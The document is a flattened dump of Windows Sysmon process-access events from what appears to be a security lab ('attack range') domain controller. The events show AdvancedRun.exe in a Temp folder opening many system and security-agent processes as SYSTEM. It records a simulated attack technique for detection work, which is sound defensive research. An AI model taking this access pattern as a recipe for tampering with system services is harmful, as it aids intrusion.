18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
